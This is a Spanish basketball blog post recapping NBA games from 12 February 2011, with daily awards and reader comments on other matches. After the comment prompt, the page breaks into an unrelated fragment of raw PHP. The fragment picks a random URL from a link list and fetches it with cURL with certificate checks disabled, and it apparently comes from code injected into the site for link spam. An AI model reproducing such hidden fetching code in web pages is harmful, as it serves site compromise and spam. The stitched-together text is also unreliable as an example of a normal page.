La Crónica (12/02/2011)

13 de February de 2011 por txusma

Ayer los Cleveland Cavaliers rompieron su infausta racha de partidos perdidos. Podríamos pensar que un equipo capaz de perder 26 partidos consecutivos ha de ser, por fuerza, el último clasificado de la liga y además de manera destacada. Pues no es así. Es cierto que los Cavs son el peor equipo de la liga pero, a pesar de perder esos ya famosos 26 partidos, se encuentran sólo a 3 victorias de los Kings, 4 de los Wolves y 5 de los Wizards. A tiro de piedra, vamos. Y es que estos equipos habrán ido ganando partidos de manera más regular pero se merecen un toque de atención tan grande o más que los Cavs y es que seguro que ninguno de los 3 pensaba a prinpicios de temporada encontrarse en la situación en la que actualmenete se encuentran.

Anoche, los 3 volvieron a perder. Los Kings fueron los que más lucharon perdiendo tan solo por dos puntos frente los Thunder obligando a Kevin Durant a ponerse serio (99-97). A la postre tan solo un triple errado por Tyreke Evans a falta de un segundo les privó de la victoria. Mucho más lejos se quedaron Wizards y Wolves. Los primeros fueron superados con claridad por los Spurs (118-94) en un partido sin historia que quedó resuelto en el primer cuarto y que permitió descansar al Big Three. Y los segundos fueron arrollados por unos Sixers que han ganado 7 de los últimos 10 partidos y se afianzan en puestos de Playoffs (107-87).

Del resto de partidos lo más interesante fue la victoria de los Bulls sobre los Hornets (97-88) de la mano de un Derrick Rose que se encuentra instalado definitivamente como uno de los mejores bases de la liga y que presenta a cada partido su candidatura al MVP. Delante de Chris Paul nos ofreció toda una exbición en el aspecto ofensivo que complementó con una buena defensa sobre el mismo Paul. Con Rose a este nivel, las aportaciones de Boozer y Deng y la probable vuelta de Noah después del AllStars, los Bulls aspiran a todo.

En Houston, Pedja Stojakovic recuperó sensaciones ofreciendo a los Mavs una nueva dimensión a su juego. Los 4 triples que anotó el serbio le permitieron situarse como el tercer cañonero de la historia en solitario y fueron fundamentales en la victoria de los Mavs sobre los Rockets (106-102). Por su parte, los Hawks cayeron en casa frente unos Bobcats que no dejaron de luchar y creyeron firmemente en la victoria durante todo el partido. A pesar de ir perdiendo de 22 puntos a la media parte, un tiro sobre la bocina de Stephen Jackson les dio la victoria (88-86).

También ganaron los Knicks (105-95) a pesar de la baja de Stoudamire sobre unos Nets sobre los que también podríamos escribir libros, y los Pacers (103-97), que desde que destituyeron a O’Brien llevan 7 victorias y sólo 1 derrota.

PREMIOS

MVP: En un día sin despampanantes actuaciones individuales, Kevin Durant y sus 35 puntos y 6 rebotes, fueron los más destacado.

Rookie: Ex-aquo para Landry Fields y Gary Neal. El primero aportó 14 puntos, 4 rebotes y 5 asistencias y el segundo anotó 2 puntos más y repartió una asistencia menos. Actuaciones casi calcadas.

Sorpresa: ¡Cómo nos gusta ver a un jugar como Shaun Livingstone marcarse buenos partidos! Anoche fue fundamental en la victoria de los Bobcats con 22 puntos, 6 rebotes y 5 asistencias.

Decepción: El banquillo de los Hawks no estuvo a la altura. El 1 de 9 de Jamaal Crawford y el 1 de 7 de Marvin Williams acabaron de enterrar las opciones de su equipo para llevarse la victoria.

Esfuerzo en vano: Los 26 puntos y 8 asistencias de Kyle Lowry, los 30 puntos y 9 rebotes de Tyreke Evans y los 28 puntos y 6 rebotes de Josh Smith tienen una cosa en común. No sirvieron para llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Scriers dice:
    #1

    Como mola la forma de jugar de Livingstone, un base alto que juega bien los estáticos y hace tiros en suspensión muy meritorios. ;or contra, su tiro exterior es flojito y con la envergadura que tiene debería robar mäs balones y defender mejor.

      Citar

  2. Txusma dice:
    #2

    Hombre, el hecho de medir más de 2 metros creo que no es precisamente beneficioso para robarle balones o defender a gente como Rose, Paul, Deron,etc…
    Pero eso sí, como mola este jugador!

      Citar

  3. MagicJohnson32 dice:
    #3

    Curiosidad: anoche ganaron los ocho visitantes.

      Citar

  4. Denise dice:
    #4

    Partidazo el que se está viviendo en el Amway. De cuatro ganan los Magic al descanso, habiendo ganado ambos cuartos. El partido está siendo muy igualado, quizás de momento decantandose de los de Florida gracias a su mayor acierto desde el perimetro. Llegaron ir 9 arriba al final del primer cuarto, pero entre Bryant y Bynum, los mejores por el momento de los amarillos, apagaron el incendio,
    Echo en falta más balones a Howard, y sobre todo que Nelson intente romper mas veces a Fisher, que ya no puede ni con las botas. Sorpresón el de Clark, que cuando llegó aqui ni le conocía y el tio le echa bastantes eggs. Lo peor, Arenas desaparecido, aunque esto ya no es noticia.
    Por los Lakers, muy malo por ahora el partido de los bases y de los aleros (los treses). Viendo el nivel de Artest y Walton, yo le daría unos minutillos a Ebanks, que las veces que le he visto me ha gustado.

      Citar

  5. Denise dice:
    #5

    En el otro gran choque de la jornada, acabo de ver que los Celtics le han ganado de manera apurada a los Heat tras haber ido ganando de 13 gracias a un espectacular tercer cuarto. Al final 82-85 con un triple doble de Rondo (11-10-10) y un 0-10 de Pierce que supongo que habrá realizado el peor partido de su vida

      Citar

  6. MagicJohnson32 dice:
    #6

    LET’S GO LAKERS!! 😀

      Citar

  7. max dice:
    #7

    La imagen del BOS-MIA es el bloqueo-agresión de K.Garnett al pobre de Mike Miller, que queda dolorido en el suelo, y la reacción de Wade que va a por KG con un par de …. y le pega un empujón que el otro no se esperaba. Me ha impresionado Wade…..

      Citar

  8. Denise dice:
    #8

    Grandisima victoria de los Magic sobre los Lakers, dejando a los angelinos en 75 puntos en 48 minutos (para que luego se critique los 60 del baloncesto europeo con 8 minutos menos). Estas han sido a mi juicio las claves del partido.
    1- Dwight Howard: Hago lo que quiero, cuando quiero, donde quiero y cuando me da la gana.
    Bestial aportación de Superman, sobre todo en la segunda parte cuando el partido se ha roto tras llegar mas o menos igualado al descanso. Ni Pau ni Bynum han podido frenarle. Entre ambos han echo peores numeros que Superman.
    Howard: 31-13-3 con 13/16 en tiros de campo.
    Pau & Bynum: 28-13-4 con 13/27 en tiros de campo.

    2- Pesimo acierto en el tiro exterior de Lakers, 2 de 16 en triples y muchos tiros fallados desde 5-6 metros (incluso del tiro libre)
    Recalcar tambien la pesima actuación del banquillo excepto Odom. Brown empezó muy bien la temporada pero va claramente de mas a menos, y Steve Blake desde el triple ganador vs Houston en el primer partido de la temporada no ha demsotrado nada. Se le sigue esperando. Y de Walton no hace falta decir nada.

    3-El rebote: 12 rebotes mas para los Magic.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>